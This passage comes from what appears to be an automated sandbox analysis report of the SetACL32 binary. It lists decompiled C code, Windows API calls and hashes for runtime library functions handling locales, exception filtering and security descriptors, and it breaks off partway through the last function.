              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID: ACP$OCP
              • API String ID: 2299586839-711371036
              • Opcode ID: a77e529743bb6338961bb4840007afe198f7aa1114ac2a92650499f80fbe5026
              • Instruction ID: a09ef97ccab4aca2eb553aa71691bc63921b62bc2207ffc52d6f8259995a6b8c
              • Opcode Fuzzy Hash: a77e529743bb6338961bb4840007afe198f7aa1114ac2a92650499f80fbe5026
              • Instruction Fuzzy Hash: 3F21B632734102AFEF358F18C905A97B7A6AF40A58B5684E4FB4ADB109E732DDC0C350
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA0C1 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 90%
              			E012DA0C1(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E012D7220(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E012D7220(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x12f207c; // 0x17
					E012DA060(_t89, 0, 0x12f1f68, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E012D9A02(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E012D9AE8(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E012D9EEC(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E012CAE19(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t101;
							}
							E012DA904(_v16,  &(_v24[0x128]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E012DA904(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E012E0A80(_t38, _t101, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x12f1f64; // 0x41
						_t75 = E012DA060(_t89, _t97, 0x12f1c58, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E012D9AE8(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t118 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E012D9A4D(_t89, _t97, _t118,  &_v20);
						goto L15;
					}
					_t114 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E012D9A4D(_t89, _t97, _t114,  &_v20);
					goto L9;
				}
			}





































              0x012da0c9
              0x012da0d0
              0x012da0d7
              0x012da0db
              0x012da0df
              0x012da0ed
              0x012da0f2
              0x012da0f3
              0x012da0f4
              0x012da0f5
              0x012da0fd
              0x012da0ff
              0x012da105
              0x012da10b
              0x012da10e
              0x012da110
              0x012da113
              0x012da117
              0x012da11e
              0x012da12b
              0x012da130
              0x012da133
              0x012da136
              0x012da136
              0x012da138
              0x012da13b
              0x012da13f
              0x012da1af
              0x012da1b1
              0x012da1b3
              0x012da1c6
              0x012da1c6
              0x012da1cd
              0x012da1d3
              0x012da1d6
              0x00000000
              0x012da1d6
              0x012da1b5
              0x012da1b8
              0x00000000
              0x00000000
              0x012da1be
              0x012da1c3
              0x00000000
              0x012da146
              0x012da146
              0x012da14a
              0x012da15c
              0x012da160
              0x012da165
              0x012da169
              0x012da16a
              0x012da1f2
              0x012da1f2
              0x012da1f4
              0x012da200
              0x012da20a
              0x012da20e
              0x012da210
              0x012da1e1
              0x012da1e1
              0x012da1e3
              0x012da1f1
              0x012da1f1
              0x012da216
              0x012da21c
              0x012da21e
              0x00000000
              0x00000000
              0x012da225
              0x012da22b
              0x012da22d
              0x00000000
              0x00000000
              0x012da22f
              0x012da232
              0x012da234
              0x012da236
              0x012da236
              0x012da247
              0x012da24c
              0x012da24e
              0x012da2ae
              0x012da2b0
              0x00000000
              0x012da2b0
              0x012da253
              0x012da25d
              0x012da26d
              0x012da273
              0x012da275
              0x00000000
              0x00000000
              0x012da27d
              0x012da28c
              0x012da292
              0x012da294
              0x00000000
              0x00000000
              0x012da29e
              0x012da2a6
              0x00000000
              0x012da2ab
              0x012da170
              0x012da17f
              0x012da184
              0x012da189
              0x012da1d9
              0x012da1d9
              0x012da1d9
              0x012da1db
              0x012da1df
              0x00000000
              0x00000000
              0x00000000
              0x012da1df
              0x012da18b
              0x012da18d
              0x012da191
              0x012da1a3
              0x012da1a7
              0x012da1ac
              0x012da1ac
              0x00000000
              0x012da1ac
              0x012da193
              0x012da196
              0x00000000
              0x00000000
              0x012da19c
              0x00000000
              0x012da19c
              0x012da14c
              0x012da14f
              0x00000000
              0x00000000
              0x012da155
              0x00000000
              0x012da155

              APIs
                • Part of subcall function 012D7220: GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
                • Part of subcall function 012D7220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
                • Part of subcall function 012D7220: _free.LIBCMT ref: 012D7282
                • Part of subcall function 012D7220: _free.LIBCMT ref: 012D72B8
              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 012DA1CD
              • IsValidCodePage.KERNEL32(00000000), ref: 012DA216
              • IsValidLocale.KERNEL32(?,00000001), ref: 012DA225
              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 012DA26D
              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 012DA28C
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
              • String ID:
              • API String ID: 949163717-0
              • Opcode ID: 3eacfaa1485c15327f1f0c070d1cbf582819e1a3a35c14173a0fa879d6f82f13
              • Instruction ID: b05795a731378ea6387e76e62392bf1e836afb6c55c001d8e2a7bc7146e7d3f6
              • Opcode Fuzzy Hash: 3eacfaa1485c15327f1f0c070d1cbf582819e1a3a35c14173a0fa879d6f82f13
              • Instruction Fuzzy Hash: EB516472A2021AABEF20DFB9DC45FBE77B8AF54740F054169EA15EB180D770DA40CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012CF1A3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 74%
              			E012CF1A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				void* _t68;
				intOrPtr _t69;
				signed int _t71;
				signed int _t73;

				_t69 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t71 = _t73;
				_t40 =  *0x1309018; // 0xedd8d3b4
				_t41 = _t40 ^ _t71;
				_v8 = _t40 ^ _t71;
				_push(_t66);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E012CBBDE(_t41);
					_pop(_t61);
				}
				E012CCDE0(_t66,  &_v804, 0, 0x50);
				E012CCDE0(_t66,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t69;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E012CBBDE(_t57);
				}
				_pop(_t68);
				return E012CAE19(_t57, _t60, _v8 ^ _t71, _t65, _t68, _t69);
			}







































              0x012cf1a3
              0x012cf1a3
              0x012cf1a3
              0x012cf1a6
              0x012cf1ae
              0x012cf1b3
              0x012cf1b5
              0x012cf1bc
              0x012cf1bd
              0x012cf1bf
              0x012cf1c2
              0x012cf1c7
              0x012cf1c7
              0x012cf1d3
              0x012cf1e6
              0x012cf1f4
              0x012cf1fa
              0x012cf200
              0x012cf206
              0x012cf20c
              0x012cf212
              0x012cf218
              0x012cf21e
              0x012cf224
              0x012cf22a
              0x012cf231
              0x012cf238
              0x012cf23f
              0x012cf246
              0x012cf24d
              0x012cf254
              0x012cf255
              0x012cf25e
              0x012cf264
              0x012cf267
              0x012cf26d
              0x012cf27a
              0x012cf283
              0x012cf28c
              0x012cf295
              0x012cf2a3
              0x012cf2a5
              0x012cf2ba
              0x012cf2c6
              0x012cf2c9
              0x012cf2ce
              0x012cf2d4
              0x012cf2db

              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 012CF29B
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012CF2A5
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 012CF2B2
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: ceadacc2590a12fd5c29e1c7dfbcde91e89a699f5ab191e0f8ad94212e0c0683
              • Instruction ID: e7a9d8884e46bcbf19a674f7756737e1b117e9c28ef9057918eb87aba0d8203c
              • Opcode Fuzzy Hash: ceadacc2590a12fd5c29e1c7dfbcde91e89a699f5ab191e0f8ad94212e0c0683
              • Instruction Fuzzy Hash: 0C31E57491122D9BCB21DF28D9897DDBBB8BF18710F5042EAE50CA7250E7709B858F45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D9A4D Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 012D7220: GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
                • Part of subcall function 012D7220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
              • EnumSystemLocalesW.KERNEL32(012D9B73,00000001,00000000,?,-00000050,?,012DA1A1,00000000,?,?,?,00000055,?), ref: 012D9ABF
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 5117ae490cbeb035719827676b630b177de58df5267b2edd6a8ac6c7c46d2058
              • Instruction ID: 958b5416fcc3ab3f3d5bb7241dcc2c35e5afca9db3d7bb4eb9a3c8b1dddce608
              • Opcode Fuzzy Hash: 5117ae490cbeb035719827676b630b177de58df5267b2edd6a8ac6c7c46d2058
              • Instruction Fuzzy Hash: 161125376107029FDF189F39D8946BAB791FF8035CB19442CEA8687A40E371A982C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D9AE8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 012D7220: GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
                • Part of subcall function 012D7220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
              • EnumSystemLocalesW.KERNEL32(012D9DC6,00000001,?,?,-00000050,?,012DA165,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 012D9B32
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 2db48c0f0d1fca00c4b852633d603ecac325cae1ef8195b33a7c4839adb76f7c
              • Instruction ID: 57a362c23bbc905b0ad0e38626aaae7da08b9fb1c4216361276903d8f671d4f9
              • Opcode Fuzzy Hash: 2db48c0f0d1fca00c4b852633d603ecac325cae1ef8195b33a7c4839adb76f7c
              • Instruction Fuzzy Hash: E0F046322103061FDF249F39D880ABABB90FF8132CB46842CFA058B680E6B19C81D700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA2C3 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 012D4E5F: EnterCriticalSection.KERNEL32(?,?,012D4345,?,013070B0,0000000C), ref: 012D4E6E
              • EnumSystemLocalesW.KERNEL32(012DA2B6,00000001,01307290,0000000C,012DA702,00000000), ref: 012DA2FB
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID:
              • API String ID: 1272433827-0
              • Opcode ID: dcccaa8ef66c4fb6ba7cd04bf476368e9a2a310bae7e7898a92b1f7f75d23d8b
              • Instruction ID: 490ad3d80b09271df2b8cd75ed79a6b331f6ecfc3660b10f048690e170bd2fa7
              • Opcode Fuzzy Hash: dcccaa8ef66c4fb6ba7cd04bf476368e9a2a310bae7e7898a92b1f7f75d23d8b
              • Instruction Fuzzy Hash: 43F06D76A14305DFD725EF98E445BADB7F0EB45B20F10815AF814DB290CBB55940CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D9A02 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 012D7220: GetLastError.KERNEL32(?,?,?,012D4163,01307070,0000000C), ref: 012D7225
                • Part of subcall function 012D7220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,012D4163,01307070,0000000C), ref: 012D72C3
              • EnumSystemLocalesW.KERNEL32(012D995B,00000001,?,?,?,012DA1C3,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 012D9A39
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 77eebae2cd7bdae19836f4a03b8ac40356a03fa4516651f721e7d3db011d51f4
              • Instruction ID: aac98e8fdfdd6b51cbae52f051d71d544b9227ed7ee43d2c9cf5b6fc1e079782
              • Opcode Fuzzy Hash: 77eebae2cd7bdae19836f4a03b8ac40356a03fa4516651f721e7d3db011d51f4
              • Instruction Fuzzy Hash: 23F0E53630020697CF159F7AE8596AABF94EFC2718B0A4059FE098F241C675D882C790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA806 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,012D074F,?,20001004,00000000,00000002,?,?,012CFD3A), ref: 012DA83A
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: c97a19dbb4afbd10578dfe43e13161e3abaf8638af97339f81476952016fde14
              • Instruction ID: fdd51602108b409f1057527a4b88cf034fba5a0389bf1649e81f2474f8c9b319
              • Opcode Fuzzy Hash: c97a19dbb4afbd10578dfe43e13161e3abaf8638af97339f81476952016fde14
              • Instruction Fuzzy Hash: A9E04F31510219BBCF222F61EC09EEE3F66EF44760F014021FD05AA150CBB29D21ABD5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DCB92 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7dc7687f6601a633c8fe2334c9b8228b73b0a36f5faf86b077d4ca6c010f5fd7
              • Instruction ID: 21da105fa31a710e7e79366042db162675ff5286760274449156c4e6d38c4f10
              • Opcode Fuzzy Hash: 7dc7687f6601a633c8fe2334c9b8228b73b0a36f5faf86b077d4ca6c010f5fd7
              • Instruction Fuzzy Hash: 96E08C72921228EBCB15DBCCC944D9AF7ECEB48A00B51409BF601D3210D270DE00EBD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C33E0 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 306memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 31%
              			E012C33E0(signed int* __ebx, intOrPtr* __ecx, struct _SECURITY_DESCRIPTOR* __edx, void* __edi, void* __esi, intOrPtr _a12, signed int _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				struct _SECURITY_DESCRIPTOR* _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				signed int _v100;
				char _v108;
				signed int _v124;
				intOrPtr* _v128;
				struct _SECURITY_DESCRIPTOR* _v140;
				intOrPtr _v148;
				void _v152;
				char _v168;
				signed int _v180;
				char _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v216;
				intOrPtr _v228;
				struct _SECURITY_DESCRIPTOR* _v232;
				signed int _v240;
				char _v244;
				signed int _t226;
				int _t230;
				signed int _t239;
				signed int _t249;
				signed int _t250;
				signed int _t258;
				signed int _t260;
				intOrPtr _t263;
				void* _t267;
				void* _t269;
				signed int _t271;
				signed int _t276;
				intOrPtr* _t277;
				intOrPtr* _t280;
				signed int _t289;
				signed int _t293;
				signed int _t300;
				signed int _t302;
				signed int _t306;
				signed int _t307;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				void* _t340;
				void* _t343;
				signed int _t349;
				signed int _t353;
				void* _t355;
				signed int _t356;
				void* _t359;
				intOrPtr* _t367;
				long _t369;
				signed int* _t370;
				intOrPtr* _t371;
				signed int* _t372;
				signed int _t379;
				intOrPtr* _t381;
				signed int _t383;
				void* _t384;
				signed int* _t386;
				signed int _t388;
				signed int _t390;
				void* _t391;
				signed int _t392;
				intOrPtr* _t394;
				char _t405;
				void* _t406;
				signed int _t413;
				signed int _t416;
				signed int _t419;
				intOrPtr* _t422;
				intOrPtr* _t423;
				intOrPtr* _t424;
				intOrPtr* _t427;
				intOrPtr* _t428;
				struct _SECURITY_DESCRIPTOR* _t430;
				signed int _t432;
				signed int _t434;
				signed int _t435;
				signed int _t437;
				void* _t438;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t449;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				void* _t456;
				void* _t457;
				signed int _t458;
				signed int _t460;
				signed int _t463;
				char _t464;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t472;
				void* _t473;
				signed int _t475;
				signed int _t477;
				void* _t480;

				_t430 = __edx;
				_t394 = __ecx;
				_t386 = __ebx;
				_t466 = _t472;
				_push(0xffffffff);
				_push(0x12ec662);
				_push( *[fs:0x0]);
				_t473 = _t472 - 0x44;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t226 =  *0x1309018; // 0xedd8d3b4
				_push(_t226 ^ _t466);
				 *[fs:0x0] =  &_v16;
				_v36 = __edx;
				_v44 = __ecx;
				_t230 = IsValidSecurityDescriptor(__edx);
				_t486 = _t230;
				if(_t230 == 0) {
					L47:
					 *[fs:0x0] = _v16;
					return 0;
				} else {
					_push(0xc);
					_v28 = 0;
					_t446 = E012CAE5D(__ebx, __edi, __esi, _t486);
					_t475 = _t473 + 4;
					_v48 = _t446;
					_v8 = 0;
					_t453 = __imp__#2;
					if(_t446 == 0) {
						_t446 = 0;
						__eflags = 0;
						L5:
						_v8 = 0xffffffff;
						_v52 = _t446;
						_t489 = _t446;
						if(_t446 == 0) {
							goto L49;
						} else {
							_push(0xc);
							_v8 = 1;
							_t386 = E012CAE5D(_t386, _t446, _t453, _t489);
							_t475 = _t475 + 4;
							_v48 = _t386;
							_v8 = 2;
							if(_t386 == 0) {
								_t386 = 0;
								__eflags = 0;
								L10:
								_v8 = 1;
								_v56 = _t386;
								if(_t386 == 0) {
									goto L51;
								} else {
									_t394 = _v44;
									_t430 =  &_v28;
									_v8 = 3;
									_t340 =  *((intOrPtr*)( *_t394 + 0x18))(_t394,  *_t386, 0, 0, _t430, 0);
									_t460 = _t453 | 0xffffffff;
									if(_t340 < 0) {
										L35:
										asm("lock xadd [ebx+0x8], eax");
										if(_t460 == 1) {
											_t349 =  *_t386;
											if(_t349 != 0) {
												__imp__#6(_t349);
												 *_t386 = 0;
											}
											_t350 = _t386[1];
											if(_t386[1] != 0) {
												E012CAE58(_t350);
												_t475 = _t475 + 4;
												_t386[1] = 0;
											}
											_push(0xc);
											E012CAE27(_t386);
											_t475 = _t475 + 8;
										}
										asm("lock xadd [edi+0x8], esi");
										if(_t460 == 1) {
											_t343 =  *_t446;
											if(_t343 != 0) {
												 *__imp__#6(_t343);
												 *_t446 = 0;
											}
											_t344 =  *(_t446 + 4);
											if( *(_t446 + 4) != 0) {
												E012CAE58(_t344);
												_t475 = _t475 + 4;
												 *(_t446 + 4) = 0;
											}
											_push(0xc);
											E012CAE27(_t446);
										}
										goto L47;
									} else {
										_t494 = _v28;
										if(_v28 == 0) {
											goto L35;
										} else {
											_push(0xc);
											_t353 = E012CAE5D(_t386, _t446, _t460, _t494);
											_t453 = _t353;
											_v24 = _t353;
